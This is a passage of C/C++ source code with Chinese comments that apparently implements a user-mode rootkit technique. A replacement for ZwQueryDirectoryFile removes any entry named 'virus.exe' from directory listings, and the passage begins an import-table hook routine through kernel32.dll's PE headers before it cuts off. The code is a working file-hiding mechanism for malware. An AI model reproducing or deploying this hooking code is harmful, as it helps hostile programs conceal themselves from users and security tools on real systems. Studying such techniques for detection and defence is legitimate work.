IN BOOLEAN ReturnSingleEntry, IN PUNICODE_STRING FileName OPTIONAL, IN BOOLEAN RestartScan ); //原始ZwQueryDirectoryFile地址 ZWQUERYDIRECTORYFILE OldZwQueryDirectoryFile = NULL; ////////////////////////////////////////////////////////////////////////// //替换原有函数 ////////////////////////////////////////////////////////////////////////// NTSTATUS WINAPI NewZwQueryDirectoryFile(HANDLE FileHandle,HANDLE Event,PIO_APC_ROUTINE ApcRoutine,PVOID ApcContext,PIO_STATUS_BLOCK IoStatusBlock,PVOID FileInformation,ULONG Length,FILE_INFORMATION_CLASS FileInformationClass,BOOLEAN ReturnSingleEntry,PUNICODE_STRING FileName,BOOLEAN RestartScan) { //先调用原有函数 LONG rret = OldZwQueryDirectoryFile(FileHandle,Event,ApcRoutine,ApcContext,IoStatusBlock,FileInformation,Length,FileInformationClass,ReturnSingleEntry,FileName,RestartScan); if (!NT_SUCCESS(rret)) { return rret; } //只取了 FileBothDirectoryInformation这种可能性 if (FileInformationClass==FileBothDirectoryInformation) { PFILE_BOTH_DIRECTORY_INFORMATION pFileInfo; PFILE_BOTH_DIRECTORY_INFORMATION pLastFileInfo; //测试的C:\\下的virus.exe的隐藏 WCHAR VIRUS[] = L"virus.exe"; BOOLEAN flag; pFileInfo = (PFILE_BOTH_DIRECTORY_INFORMATION)FileInformation; pLastFileInfo = NULL; do { flag = !( pFileInfo->NextEntryOffset ); //宽字符比较,暂用WCSSTR if(wcsstr(pFileInfo->FileName,VIRUS)!=NULL) { if(flag) { pLastFileInfo->NextEntryOffset = 0; break; } else { int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformation; int iLeft = (DWORD)Length - iPos - pFileInfo->NextEntryOffset; memcpy( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), (DWORD)iLeft ); continue; } } pLastFileInfo = pFileInfo; pFileInfo = (PFILE_BOTH_DIRECTORY_INFORMATION)((char *)pFileInfo + pFileInfo->NextEntryOffset); }while(!flag); } return rret; } ////////////////////////////////////////////////////////////////////////// //Hook Function ////////////////////////////////////////////////////////////////////////// BOOL HookQueryFile(BOOL flag) { //确定Kernel32.dll的基地址 HMODULE hModule = LoadLibrary("kernel32.dll"); if (hModule==NULL) { return FALSE; } PIMAGE_DOS_HEADER pDosHdr = (PIMAGE_DOS_HEADER)hModule; if (pDosHdr->e_magic!=IMAGE_DOS_SIGNATURE) { return FALSE; } PIMAGE_NT_HEADERS pNtHdr = (PIMAGE_NT_HEADERS)((ULONG)hModule+pDosHdr->e_lfanew); if (pNtHdr->Signature!=IMAGE_NT_SIGNATURE) { return FALSE; } if (pNtHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress==NULL || pNtHdr->O |